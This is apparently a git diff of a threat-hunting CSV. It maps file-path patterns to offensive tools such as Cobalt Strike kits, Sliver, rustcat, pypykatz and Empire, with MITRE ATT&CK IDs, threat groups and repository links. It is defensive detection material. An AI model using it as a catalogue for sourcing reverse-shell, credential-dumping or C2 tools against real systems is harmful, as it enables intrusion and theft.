+"*/src/nysm.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/src/RecycledGate.h*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*/src/Sleeper.cpp*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" -"*/srdi-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/src/unixshell.rs*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/srdi-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/ssh2-enum-algos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssh-auth-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssh-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -5464,22 +5524,22 @@ "*/sslv2.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sslv2-drown.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssp/decryptor.py","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*/SspiUacBypass.git*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*/SspiUacBypass.git*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*/ssploit/*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" -"*/SSRFmap*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2463","459","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*/SSRFmap*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "*/sstp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/StackCrypt.git*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*/stage_wmi*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/stager.ps1*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/stager/powershell.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/stager/powershell/payload.ps1*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*/stagers/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/stagers/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/stagers/CSharpPS*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*/start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/StaticSyscallsAPCSpawn/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/StaticSyscallsInject/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" -"*/StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*/Staykit/StayKit.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/Staykit/StayKit.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*/stinger_client.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*/striker.c","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/Striker.git*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" @@ -5489,41 +5549,41 @@ "*/stun-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/stun-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/stuxnet-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/subdomain.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*/subdomains.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*/subdomain.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/subdomains.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*/subdomains-10000.txt*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/Suborner.git*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" -"*/sudo_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" -"*/sudomy.api*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" 